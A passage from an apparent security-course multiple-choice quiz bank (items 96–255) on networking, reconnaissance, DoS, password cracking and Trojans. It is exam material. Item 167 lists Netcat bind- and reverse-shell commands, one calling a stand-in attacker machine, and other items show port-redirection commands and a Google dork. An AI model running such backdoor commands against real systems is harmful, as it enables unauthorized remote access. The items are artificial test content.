a) Apply the principle of providing least privilege rights to user.
b) Implement per user limits on the consumption of file system space, memory and CPU usage.
c) Deploy some system monitoring software that can detect when system resources are running low.
d) Keep your system regularly patched and apply relevant security bug fixes.

96. You suspect one of your servers may have succumbed to a SYN flood attack. Which one of the following tools might you consider using to help confirm your suspicions?
a) Netstat
b) Ping
c) Tracert
d) Ipconfig

97. Which of the following is NOT the correct countermeasure against SYN flooding?
a) increase the size of connection queue
b) have redundant communication links to sensitive systems that must be all the time connected to the Internet.
c) use SYN cookies
d) Do not dole out user privileges carelessly

98. Which of the following is a probable cause of a hacker creating a back door in a system?
a) The hacker is trying to guess the credentials of the user.
b) The hacker is trying to get access without having to authenticate.
c) The hacker is trying to get personal information form the user over the phone.
d) The hacker is trying to connect to the user's wireless home network.

99.Which of the following are TRUE about a Script Kiddie?
i. With low-level hacking skills
ii. Use released tools and software to exploit without understanding the underlying vulnerability
iii. Biggest group of attackers and usually rather immature
iv. Use Social Engineering technique

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

100. Passwords can be intercepted as they move through networks via which of the following?
a) Keyboard sniffers
b) Password sniffers
c) Trojan horses
d) Cookies

101. Which of the followingis the process of identifying and reducing risk to a level that is comfortable and then implementing controls to maintain that level?
a) Return on investment
b) Risk
c) Risk analysis
d) Risk management

102. Which of the following is the best option for a network administrator to prevent attacker to figure out users' IDs or password?
a) Session Hijacking
b) URL Session Tracking
c) Disable cookies
d) Hidden form elements

103. Which of the following statement is FALSE about ICMP (Internet Control Message Protocol)?
a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks
b) ICMP “mapping” is often conducted via a ping sweep
c) ICMP manipulates the time-to-live (TTL) option in UDP packets
d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

104. TCP/IP family of protocols includes several components:
i. Transmission Control Protocol (TCP);
ii. User Datagram Protocol (UDP);
iii. Internet Protocol (IP);
iv. Internet Control Message Protocol (ICMP)

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

105. Illegal or unauthorized zone transfers are a significant and direct threat to what type of network server?
a) Web
b) DHCP
c) DNS
d) Database

106. ________ is the protocol Microsoft uses to share files, printers, and serial ports, and also to communicate between computers using named pipes.
a) Server Message Block (SMB)
b) Resource Control Block (RCB)
c) Traffic Message Block (TMB)
d) Communication Message Block (CMB)

107. Which of the following measures can be used to defend against Network Mapping?
i. Filter out the underlying message that network mapping tools rely on by using firewalls and the packet filtering router;
ii. Block incoming ICMP message;
iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;
iv. To prevent an attacker from discovering open ports on your
machine is to close all unused ports

a) i and ii;
b) ii and iii;
c) i, ii and iii;
d) i, ii, iii and iv.

108. You can start to build defenses for your information system by creating security ____________.
a) foundations
b) baselines
c) pillars
d) planes

109. Under Phase of Attacks, DoS (Denial-of-Service) Attack is considered as which phase?
a) Reconnaissance;
b) Scanning;
c) Gaining Access;
d) Maintain Access;

110. Which type of Buffer Overflow Exploits allows attacker to access the system as an impersonated root user?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

111. Which of the following techniques are considered as Malformed Packet DoS Attacks?
i. Land
ii. Ping of Death
iii. Rose
iv. Bonk

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

112. Running the following command at the PC with IP address 192.168.1.2. What does it mean? fpipe –l 1000 –r 5000 192.168.1.23
i. It is port redirection;
ii. Setup the PC (192.168.1.2) to listen to port 5000;
iii. PC 192.168.1.2 will pick up traffic entering at port 1000;
iv. The traffic arrives at port 1000 will be redirected to PC 192.168.1.23 at port 5000.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

113. You are the security administrator for a bank. The users are complaining about the network being slow. However, it is not a particularly busy time of the day. You capture network packets and discover that hundreds of ICMP packets have been sent to the host. What type of attack is likely being executed against your network?
a) Spoofing
b) Man-in-the-middle
c) DNS kiting
d) Denial of service

114. Which of the following is Not the functionality of BOTs software?
a) DoS flood
b) File morphing
c) Special UDP port scanning
d) E-mail address harvester

115. The File Transfer Protocol (FTP) can be accessed by each of the following except ________.
a) Web browser
b) FTP client
c) command line
d) LPTP server

116. The Transmission Control Protocol/Internet Protocol (TCP/IP) protocal that handles outgoing mail using port 25 is ______.
a) Simple Mail Transfer Protocol (SMTP)
b) Post Office Protocol (POP)
c) Internet Mail Access Protocol (IMAP)
d) Secure/Multipurpose Internet Mail Extensions (S/MIME)

117. What is the best measure to keep zombies off the system?
a) limits Bandwidth
b) install DDoS detection and throttling tools on your network
c) employ egress anti-spoof filters on external routers or firewall.
d) deploy filters upstream to block flood traffic.

118. Which of the following represent the pool of well-known ports?
a) 0 through 255
b) 0 through 1023
c) 0 through 49151
d) 1024 through 49151

119. To prevent an attacker from discovering open ports on your machine is to _______.
a) close all unused ports
b) assign strong passwords to all ports
c) hide all ports
d) terminate services on open ports

120. Which of the following advantages are associated with using a firewall?
a) It provides an inexpensive meansto share the Internet connection.
b) It is used to block undersired external access to internal network resources.
c) It is used to monitor the use of Internet by internal users.
d) It is used to hide the internal addressing scheme of the network.

121. After running John the Ripper, the cracked password is stored in a local file called ________.
a) John.pot
b) Ripper.pot
c) Password.pot
d) Crack.pot

122. General types of reconnaissance data can be obtained from Internet are:
i. Employee data
ii. Business partner
iii. Existing technologies
iv. Financial information

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

123. Internet search engines are used by attacker because they provide the following facilities except ________.
a) Internet directories
b) Link crawlers
c) Caches
d) Hyperlinks

124. Which software tool can be used for cracking window95, window98, SQL2000, Cisco PIX, and router's MD5 hashes?
a) John the Ripper
b) Brutus
c) Super Cracker
d) Cain

125. An attack that opens numerous ports for bogus connections, thereby denying legitimate connections, is called a ______.
a) ACK Flood
b) TCP/UDP Flood
c) Port Flood
d) SYN Flood

126. Which of the following statements is FALSE about Risk Management?
a. Risk can be qualitatively defined in three levels: Low, Medium and High
b. Risk Management is about Security
c. Risk management determines the value of the resources and the level of security for it
d. Threat + Vulnerability = Risk

127. A(n) __________ is a weakness that allows a threat agent to bypass security.
a) vulnerability
b) exploit
c) risk
d) mitigation

128. Which of the following is an advantage of using virtual machines?
a) Reduces the need to install OS software updates.
b) Allows an OS to run in its own separate, secure area on a system.
c) Helps secure the hardware from unauthorized access.
d) Anti-virus software has to be installed only once.

129. A host has an IP address of 128.78.3.2. The network is subnetted by borrowing the first 3 bits of host address bits. What is the subnet mask for 128.78.3.2?
a) 255.255.224.255
b) 255.255.0.0
c) 255.255.255.224
d) 255.255.224.0

130. Each of the following protocols can be used to encrypt transmissions over the Internet except _________.
a) Common Gateway Interface (CGI)
b) Secure Sockets Layer (SSL)
c) Personal Communications Technology (PCT)
d) FORTEZZA

131. The following are commonly used techniques for reconnaissance except ________.
a) Low-technology reconnaissance
b) Web searches
c) Whois database analysis
d) High performance hardware

132. Which of the following IP address class is reserved for future use?
a) Class A
b) Class C
c) Class D
d) Class E

133. There are two ways that a SYN flood can exhaust the communication resources of a target:
i. Flood the connection queue;
ii. Flood the entire communication link;
iii. Flood the switch;
iv. Flood the router.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

134. Which of the followings are TRUE about DDoS (Distributed Denial-of-Service) attack?
i. Distributed Denial-of-Service is a simple SYN flood allowed an attacker to generate traffic from one machine
ii. The attacker first take over a large number of victim machines around the world, often referred to as zombies.
iii. The zombies software is the component of the DDoS tool that waits for a command from the attacker, who uses a client tool to interact with the zombies
iv. Tribe Flood Network 2000 (TFN2K) is one of the most fully featured DDoS-specific tool

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

135. What is the name of the unique physical address that is assigned to every network interface card?
a. IP address
b. Hostname
c. MAC address
d. NetBIOS name

136. What does an attacker do in Reconnaissance Phase?
i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack
ii. The core of Reconnaissance attack is intrusive information gathering techniques
iii. System is breached or accessed in order to retrieve information

a. i only;
b. i and ii;
c. i, ii and iii;
d. None of the above.

137. A(n) _______ identifies what program or service on the receiving computer is being accessed.
a) process
b) UPD designator
c) port number
d) service-initiated socket (SIS)

138. Which of the following is a coordinated effort in which multiple machines attack a single victim or host with the intent to prevent legitimate service?
a) DoS
b) Masquerading
c) DDoS
d) Trojan Horse

139. Which of the following statements is FALSE about the key terms used in the risk management process?
a. A Resource is anything in an environment that trying to protect
b. A Threat is a resouce can be accessed by making use of a vulnerability in your environment
c. A Vulnerable is a point where a resource is susceptible to attack
d. Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

140. IP resides at which layer of the OSI model?
a) Application
b) Data Link
c) Network
d) Physical

141. The qualities and characteristics of the network traffic generated by Nmap's ping scan are called its _________.
a) signature
b) socket
c) scan profile
d) stealth

142. Which of the following statements are TRUE about Trojan horse?
i. Most Trojan horse have two parts: Server and Client;
ii. The server-program part is a program or file that is installed on the victim’s machine;
iii. The client-program part is on the attacker’s system;
iv. Trojan horse attacks pose one of the most serious threats to computer security.

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

143. An attacker normally takes inventory of which type of ports on the system?
a) well done ports.
b) easy ports.
c) open ports.
d) unsecured ports.

144. What is the usage of Cookie?
a) to prevent sniffing
b) to prevent ARP cache poisoning
c) to prevent spoofing
d) to prevent SYN flooding

145. Which of the following is FALSE about User Datagram Protocol (UDP)?
a) It is connection protocol
b) Packet transmitted does not put in order
c) No packet lost retransmission
d) No acknowledgement or session tear down required

146. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.
a) 65536 and 65536
b) 32768 and 32768
c) 32768 and 65536
d) 65536 and 32768

147. You connected your company to the Internet, and security is a concern. What should you install?
a) Higher-quality servers
b) Firewall
c) DNS
d) Switches

148. A port scanner has reported that your web server running with a supporting SQL database is listening on TCP ports 80, 443, 21, and 1433. Which of these ports is unnecessary and should be closed to prevent hacking attempts?
a) 80
b) 21
c) 1433
d) 443

149. Each of the following is intended to protect information except __________.
a) people
b) policies
c) equipment
d) confidentiality

150. Attacker can ask the server to send all information it has about a given domain through requesting a ________ from the name server.
a) domain transfer
b) nslookup
c) zone transfer
d) display all

151. Which application-level Trojan backdoor is able to modify or replace critical operating system executable programs or libraries?
a) Operating-Mode Rootkits
b) System-Mode Rootkits
c) User-Mode Rootkits
d) Kernel-Mode Rootkits

152. Each of the following is an attribute that should be compiled for hardware when performing an asset identification except __________.
a) the name of the equipment
b) the manufacturer's serial number
c) the MAC and IP address
d) the cost

153. Which of the following is not a well known TCP port number?
a) 8888
b) 53
c) 80
d) 25

154. An attacker with low skill level is called ?
a. Cracker
b. Hacker
c. Script Kiddie
d. Phreaker

155. _______ is the interception of network data not intended for the machine that is intercepting the traffic.
a) Packet sniffing
b) Packet spoofing
c) Packet stealing
d) Packet engineering

156. The following are useful data elements from the Registrar of Whois Search except _______.
a) Names
b) Registration dates
c) Hardware models
d) Name servers

157. A person wishing to prevent users from accessing a web server and the information on it would try a ____ attack.
a) web service
b) denial of service
c) system service
d) internet service

158. Attackers known as ____________ like to think of themselves as an elite group who are performing a valuable service in identifying security weaknesses.
a) crackers
b) script kiddies
c) hackers
d) cyberterrorists

159. Which of the following is Not a functional feature of Kernel-Mode Rootkits?
a) Hide an attacker's processes.
b) Hide selected types of events from the Windows Event Viewer.
c) Hide the ports used by an attacker.
d) Hide device drivers, including itself, so an administrator cannot see them installed on the system.

160. Which of the following is not a feature or capability of a port scanner?
a) Determine open ports
b) Determine active services
c) Determine target OS
d) Determine weakness of OS

161. What is the purpose of a site survey?
a) Improve wireless signal strength
b) Eliminate unwanted access locations
c) Distribute WEP keys
d) Plan the design of a wired network

162. During an audit of a server system log, which of the following entries would be considered a possible security threat?
a) Five failed login attempts on an admin account.
b) Two successful logins with the backup account.
c) A 500K print job sent to a printer.
d) Three new files saved in the accounting folder by user finance.

163. In order to determine which class any IP address is in, one should examine the first _____ bits of the IP address.
a) 8 bits
b) 3 bits
c) 4 bits
d) 5 bits

164. Which of the following software is a good port scanning tool?
a) Telnet
b) Nmap
c) ipconfig
d) portscan

165. Which software tool can be used for sniffing password?
a) John the Ripper
b) Brutus
c) John the Sniffer
d) Cain

166. You are connected to a server on the Internet and you click on a link on the server and receive a time-out message. What layer could be the cause of this message?
a) Application
b) Transport
c) Network
d) Physical

167. Which Netcat command is used as a backdoor on window systems?
a) c:\>nc -l -p 12345 -e cmd.exe
b) c:\>nc -l -p 12345 -e /bin/sh
c) c:\>nc -l -p 12345 -e ncrelay.bat
d) c:\>nc [attackers_machine] 12345 -e /bin/sh

168. In TCP header, there are TCP control bits, also know as the TCP flags.
a) 6
b) 7
c) 8
d) 9

169. Which of the following is NOT a countermeasures for password attack?
a) adopt a strong password policy.
b) educate user to security awareness.
c) conduct password cracking tests.
d) store encrypted or hashed password files in user account.

170. HTTP, FTP and Telnet work at which layer of the OSI model?
a) Application
b) Presentation
c) Session
d) Transport

171. Which of the following is a weak password policy?
a) use minimum of nine alphanumeric characters
b) implement aging password
c) use passphrases
d) use dictionary form password

172. Which type of Buffer Overflow Exploits will cause the operating system to shutdown or crash?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

173. Which software is used to extract password representations?
a) Cracker
b) John the Ripper
c) Pwdump3
d) Brutus

174. For Dos (Denial-of-Service) Attack, Stopping service can be achieved by:
i. Process killing
ii. Process crashing
iii. System reconfiguring
iv. Malformed packet attacks

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

175. _______ is the method used by Nmap to determine the operating system of the target comptuer.
a) Stack fingerprinting
b)OS fingerprinting
c)Banner stamping
d)OS stamping

176. Metasploit offers a huge set of _____, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself.
a) payloads
b) options
c) utilities
d) exploits

177. Internet is “managed” by
a. APNIC
b. ICANN
c. AfriNIC
d. ARIN

178. A password cracker is needed to quickly rediscover a password. It is believed the password is only seven characters long, but was computer generated. Which of the following techniques would be the best method to use?
a) Online guessing
b) Dictionary
c) Brute force
d) Hybrid

179. Each of the following is a characteristic of information except __________.
a) integrity
b) confidentiality
c) conformity
d) availability

180. The use of Domain Name System (DNS) is to _________.
a) translate computer's domain name into its appropriate IP address.
b) translate IP address into its appropriate computer's domain name.
c) translate computer's IP address into its approprate MAC address.
d) check for the correct computer's domain name.

181. Which of the following is a hardware or software system used to protect a network from unauthorized access?
a) Firepot
b) Windows XP
c) Honeypot
d) Firewall

182. Which one of the following is not a private IP address?
a) 10.1.2.1
b) 165.193.123.44
c) 172.18.36.4
d) 192.168.0.234

183. The most widely-deployed tunneling protocol is _________.
a) L2TP
b) RADIUS
c) PPP
d) PPTP

184. What port does the netbus server listen on?
a) 12345
b) 12346
c) 12347
d) any number greater than 12347

185. Which of the following SuperScan's tool is used to uncover the users account list at the target machine?
a) User Account Exploit
b) User engineering
c) Windows Enumeration
d) Windows User Exploit

186. Which of the following best describes a vulnerability?
a) A weakness in the configuration of software or hardware that could allow a threat to damage the network
b) Any agent that could do harm to your network or its components
c) The likelihood of a particular event happening given an asset and a threat
d) Measures the cost of a threat attacking your network

187. Which of the following is associated with behaviors such as collecting personal information or changing your computer configuration, without appropriately obtaining prior consent?
a) Trojan
b) Botnet
c) Spyware
d) Rootkit

188. You suspect that a system is infected with a Trojan Horse program and is sending data outbound from the system. Which of the following can be used to detect this activity?
a) Anti-spam software
b) Pop-up blocker
c) HIDS
d) Personal firewall

189. The most effective method of defending against social engineering is _________.
a) user awareness
b) strong password
c) anti-social
d) high end security tools

190. In Microsoft Windows, the name of the background program, such as Svchost.exe, is called a ________.
a) process
b) service
c) display service
d) parent service

191. Each of the following is a hacker's activity profile category except __________.
a) black hats
b) white hats
c) green hats
d) grey hats

192. What is usually the first phase conducted before doing a site penetration?
a) Information gathering
b) Cracking
c) Social engineering
d) Spoofing

193. Each of the following is an authentication technology except _________.
a) IEEE 802.11b
b) RADIUS
c) TACACS+
d) IEEE 802.1X

194. Which of the following is a correct URL of a web site using the SSL protocol?
a) http://www.sp.edu.sg
b) httpssl://www.sp.edu.sg
c) http://www.sp.edu.sg/ssl
d) https://www.sp.edu.sg

195. Which of the following protocol does Ethereal indicate when you launch a Web browser?
a) HyperText Transfer Protocol (HTTP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Internet Control Message Protocol (ICMP)

196. A network-based IDS is not suitable for detecting or protecting against which of the following?
a) E-mail spoofing
b) Denial-of-service attacks
c) Attacks against the network
d) Attacks against an environment that produce significant traffic

197. What is the purpose of Banner grabbing?
a) Is to grab the version of operating system used by target machine and its exploits.
b) Is to grab the message of the day banner from the network router.
c) Is to gain access to the system to look for which Web Server Application is running, its version and exploits.
d) is to extract a copy of Web server home page.

198. One reason employees are so successful at attacking their company's computers is __________.
a) they have superior networking skills
b) employees already have access to some company information
c) a company's information security is focused on keeping out intruders
d) employees have unlimited access to company computers

199. _______ and _______ are examples of Trojan programs.
a) Netbus, subseven
b) Netbus, supertrojan
c) Back Orifice, subeight
d) Back Orifice, supertrojan

200. Which is the best countermeasure to social engineering attacks?
a) Preventing the download of mobile code from the Internet
b) Employee training
c) Strong password policies
d) Auditing user activities

201. Which software tool can be used for port redirection apart from WinRelay?
a) PWdump3
b) Remote-Anything
c) Fpipe
d) DCOM RPC Exploit

202. Which protocol uses port 22 by default?
a) Telnet
b) FTP
c) SSH
d) HTTPS

203. Which type of Buffer Overflow Exploits allows attacker to install backdoor programs in victims's machine?
a) Program Buffer Overflow
b) Heap Overflow
c) Stack-based Buffer Overflow
d) Memory buffer Overflow

204. A computer system is suspected of carrying a rootkit. What is the most efficient method of removing the rootkit?
a) Install anti-spyware software.
b) Disable the BIOS of the computer system and reboot.
c) Install the latest operating system update patch.
d) Reinstall the operating system.

205. Another name for anonymous FTP is _________.
a) blind FTP
b) free user FTP
c) Freenet
d) Unannounced FTP

206. Performing a ______ scan with Nmap can help an attacker avoid detection.
a) silent
b) secret
c) stealth
d) smooth

207. Each of the following is a phase of a malicious hacker attack except __________.
a) reconnaissance
b) clearing tracks
c) social engineering
d) scanning

208. Which of the following describes a passive attack?
a) Does not insert data into the stream but instead monitors information being sent.
b) Records and replays previously sent valid messages.
c) Inserts false packets into the data stream.
d) Makes attempts to verify the identify of the source of information.

209. Explain the command execution statement as shown:- >winrelay -lip 192.168.20.2 -lp 1002 -dip 193.21.74.35 -dp 1020 -tcp
a) tcp traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.
b) tcp traffic is redirected from source 192.168.20.2 at port 1020 to destination address 193.21.74.35 port 1002.
c) tcp traffic is redirected from source 193.21.74.35 at port 1020 to destination address 192.168.20.2 port 1002.
d) traffic is redirected from source 192.168.20.2 at port 1002 to destination address 193.21.74.35 port 1020.

210. A person who applies his hacking skills for offensive purpose is known as
a. Cracker
b. White Hat
c. Ethical Hacker
d. Phreaker

211. Which of the following is example of social engineering?
a) An attacker configures a packet sniffer to monitor user logon credentials.
b) An attacker sets off a fire alarm so that he can access a secured area when the legitimate employees are evacuated.
c) An attacker waits until legitimate users have left and sneaks into the server room through the raised floor.
d) An attacker unplugs a user's network connection and then offers to help try to correct the problem.

212. Which of the folloiwng statement best describe a zombie?
a) It executes instruction command simultaneously to conduct a DoS attack. It is triggered by another system which is client of the attacker system.
b) It is a Netcat client of an attacker system. This client in return triggers DoS attack at the target system.
c) It is an unintelligent system that attacks the target system with fragmented packets.
d) It is an unintelligent system that sleeps all the way when their resources are exhausted by a DoS attack

213. Which of the following is NOT the correct method to enforce strong password policy?
a) enable the password complexity requirement.
b) use password filtering program.
c) use combination of standard and special characters.
d) encourage user to use special and difficult words.

214. You need to have secure communications using HTTPS. What port number is used by default?
a) 53
b) 23
c) 80
d) 443

215. Which of the following is the strongest form of authentication?
a) Biometric
b) Two-factor
c) Something you have
d) Username and password

216. Each of the following is a type of attacks except __________.
a) Access Attack
b) Denial of Service Attack
c) Security Attack
d) Repudiation Attack

217. Which of the following tools would be able to capture and view network packets that were transmitting passwords in clear text?
a) Vulnerability scanner.
b) Password cracker.
c) Network mapper.
d) Protocol analyzer.

218. The following are defence practices from DNS-based reconnaissance except _________.
a) domain names should not indicate any machine's operating system type
b) restrict zone transfers
c) block all ports except port 80
d) User Datagram Protocol (UDP) port 53 is used for DNS queries and responses, must be allowed for DNS to resolve name

219. Each of the following is a characteristic of the Layer 2 Tunneling Protocol (L2TP) except _________.
a) It merges the features of PPTP and Layer 2 Forwarding Protocol (L2F)
b) It requires a TCP/IP network
c) It can be implemented on devices like routers
d) It can support advanced encryption methods

220. To be beneficial to a company, which of the following is the most practical relationship between a security risk and its countermeasure?
a) The cost of the countermeasure should be less than the potential cost of the risk.
b) The cost of the countermeasure should be greater than the potential cost of the risk.
c) The cost of the countermeasure should be less than the cost of the asset.
d) The cost of the countermeasure should be greater than the cost of the asset.

221. What is a default password on a server system?
a) password that are set by the system manufacturer.
b) password that are set by the first user.
c) the password is "default"
d) password that are set by the administrator

222. The premise behind reconnaissance activities is to profile the following except _________.
a) size of organisation
b) administrative staff
c) network infrastructure
d) an organisation operations

223. Which TCP/IP utility is most often used to test whether an IP host is up and functional?
a) ftp
b) telnet
c) ping
d) netstat

224. Which of the following is not one of the Google's important technology?
a) Google help
b) Google cache
c) Google index
d) Google bots

225. Which of the following is NOT a type of port scanning?
a) IP Protocol Scan
b) Busy Scan
c) Idle Scan
d) UDP Port Scan

226. What is a blind FTP site?
a) A site where users don't authenticate
b) A site where all traffic is encrypted
c) A site where only anonymous access is allowed
d) A site where users can upload but not download

227. What is the name given to the activity that involves collecting information that will later be used for monitoring and review purposes?
a) Logging
b) Auditing
c) Inspecting
d) Vetting

228. Which of the following sentence best describe SYN cookies?
a) It is a SYN packet that consists of SYN - ACK and RESET signal.
b) It is a SYN grabber that grabs a session sequence number.
c) It is a single value created by a cryptographic one-way hash function to the source and destination IP addresses, port numbers and secret number.
d) It is a special number that provides source destination IP addresses and session sequence number.

229. The objectives of port scanning are to identify the following except ______.
a) Hardware model number
b) Open ports
c) Host operating system
d) Software or service versions

230. Each of the following can be identified as physical security except __________.
a) door locks
b) alarm systems
c) antivirus software
d) lighting

231. A host has a Class B, IP address of 128.78.0.2. Which network address does this host belongs to if there is no subnetting?
a) 128.78.0.0
b) 128.78.1.0
c) 128.78.2.0
d) 128.78.3.0

232. When attacker interact with an Web application, it starts to guess IDs and password of that session. This form of Web attack is known as ______.
a) Session Hijacking
b) URL Session Tracking
c) Account Harvesting
d) Web Harvesting

233. A rootkit has been discovered on your mission-critical database server. What is the best step to take to return this system to production?
a) Download history
b) Run an antivirus tool
c) Install an HIDS
d) Apply vendor patches

234. If the attack is process killing, which of the following category of Denial-of-Service attack it belong to?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

235. Services using an interprocess communication share such as network file and print sharing services leave the network susceptible to which of the following attacks?
a) Spoofing
b) Null sessions
c) DNS kiting
d) ARP poisoning

236. Which of the following components of an IP address is used to distinguish the network address from a host address?
a) Default geteway
b) Subnet mask
c) DNS server
d) WINS server


237. The purpose of the Ethereal's Filter option is to view desired _________.
a) Source
b) Destination
c) Info
d) Protocol


238. Explain the command execution statement as shown:- >fpipe -l 8081 -r 8080 192.168.1.5
a) redirect traffic from local machine at port 8081 to 192.168.1.5 port 8080.
b) redirect traffic from port 8081 to port 8080 on the same machine with IP address 192.168.1.5.
c) redirect traffic from local machine at port 8080 to 192.168.1.5 port 8081.
d) redirect traffic from port 8080 of 192.168.1.5 to port 8081 of the attacker's system.



239. Which layer of the OSI model is responsible for converting data into signals appropriate for the transmissiion medium?
a) Application
b) Network
c) Data Link
d) Physical

240. The following are the most notable password cracking tools except ______.
a) SuperCracker
b) Cain
c) John the Ripper
d) Pandora

241. Password guessing tools are useful in finding passwords on target machine except ______.
a) it is difficult to use
b) it might take too long
c) it does not offer brute-force selection feature
d) it words library is too small

242. A port scan has been performed on your e-mail server. Which of the following services and ports should be disabled?
a) TCP port 21.
b) TCP port 25.
c) TCP port 110.
d) TCP port 143.

243. Which of the following devices connects different network segments and uses tables to create a map of the network topology?
a) Switch
b) Router
c) Bridge
d) Hub

244. What port is used for a DNS zone transfer?
a) 53
b) 80
c) 135
d) 137

245. What is the best countermeasure against malicious code?
a) Manage user behavior
b) Prevent reuse of external removable media
c) Use antivirus software
d) Disable mobile code on web browsers

246. Which utility can you use to find the MAC and TCP/IP addresses of your Windows workstation?
a) ping
b) ipconfig
c) ipconfig /all
d) tracert

247. The following are defences against password cracking attacks except _______.
a) anti-password cracking software
b) strong password policy
c) password filtering software
d) use other authentication tools

248. Which of the following web server characteristics would be flagged as a risk by a vulnerability scanner?
a) Operating system not updated to latest patch level.
b) HTTPS server listening on port 443.
c) Network packets being sent in clear text.
d) HTTP server listening on port 80.

249. Which of the following is a valid Google's search command to look for all text files contain "secret"?
a) site:all filetype:txt secret
b) site:com filetype:txt secret
c) site:org filetype:txt secret
d) site:net filetype:txt secret

250. Firewalls provide security through what mechanism?
a) Watching for intrusions
b) Controlling traffic entering and leaving a network
c) Requiring strong passwords
d) Preventing misuse of company resources

251. When the telnet service is activated, it is accessed through ______.
a) TCP port 21
b) TCP port 80
c) TCP port 23
d) TCP port 25

252. The Ethereal packet capturing process would display the following except ______.
a) User id and password
b) Source
c) Destination
d) Protocol

253. You want to use NAT on your network, and you have received a Class C address from your ISP. What range of addresses should you use on the internal network?
a) 10.x.x.x
b) 172.16.x.x
c) 172.31.x.x
d) 192.168.x.x

254. Which of the following files is most likely to contain a virus?
a) database.dat.
b) bigpic.jpeg.
c) note.txt.
d) picture.gif.exe.

255. An attacker trying to exploit a web server will likely want to scan systems running web services. What port will the attacker scan for?
a) 21
b) 25
c) 80
d) 110

Download link for  255 quiz with all answer For Final Exam Topic 1 to Topic 11